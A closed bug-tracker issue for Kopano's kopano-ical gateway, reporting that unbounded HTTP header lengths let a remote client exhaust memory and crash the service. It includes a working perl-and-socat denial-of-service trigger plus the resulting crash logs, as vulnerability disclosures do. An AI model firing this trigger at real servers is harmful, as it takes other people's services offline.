Uploaded image for project: 'Kopano Groupware Core'
  1. Kopano Groupware Core
  2. KC-1973

ical: HTTP headers don't have a length restriction

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Highest
    • Resolution: Done
    • Affects Version/s: None
    • Fix Version/s: 8.7.20
    • Component/s: kopano-ical
    • Security Level: Public
    • Labels:
      None
    • Environment:
      kopano-core 8.7.19

      Description

      https://www.openwall.com/lists/oss-security/2021/03/19/6

      The "kopano-ical" program implements a network service/trivial HTTP server. It imposes no length restrictions on HTTP headers, which can be exploited to memory-exhaust the process and have it terminate.

      # Trigger
      
      »
        perl -e 'print "GET / HTTP/1.0\nHost: \n"; 
                 while(1) { print " " . "A" x 65000 . "\n"; }' |
        socat - tcp-connect:kopano-ical.example.com:8080
      
      The exact port depends on configuration; 8000 is also typical choice.
      
      » systemctl status kopano-ical
      ● kopano-ical.service - Kopano Groupware Core iCal/CalDAV Gateway
         Loaded: loaded (/usr/lib/systemd/system/kopano-ical.service; enabled; vendor preset: disabled)
         Active: failed (Result: signal) since Fri 2021-03-19 13:24:26 CET; 32s ago
           Docs: man:kopano-ical(8)
                 man:kopano-ical.cfg(5)
        Process: 2126 ExecStart=/usr/sbin/kopano-ical -F (code=killed, signal=ABRT)
       Main PID: 2126 (code=killed, signal=ABRT)
      
      kopano-ical[2126]: terminate called after throwing an instance of 'std::bad_alloc'
      kopano-ical[2126]: ----------------------------------------------------------------------
      kopano-ical[2126]: Fatal error detected. Please report all following information.
      kopano-ical[2126]: kopano-ical 8.7.16.0
      kopano-ical[2126]:   what():  std::bad_alloc
      systemd[1]: kopano-ical.service: Main process exited, code=killed, status=6/ABRT
      systemd[1]: kopano-ical.service: Unit entered failed state.
      systemd[1]: kopano-ical.service: Failed with result 'signal'.}}
      

        Attachments

          Issue Links

            Activity

              People

              Assignee:
              Unassigned Unassigned
              Reporter:
              jhopmans Joost Hopmans
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

                Dates

                Created:
                Updated:
                Resolved: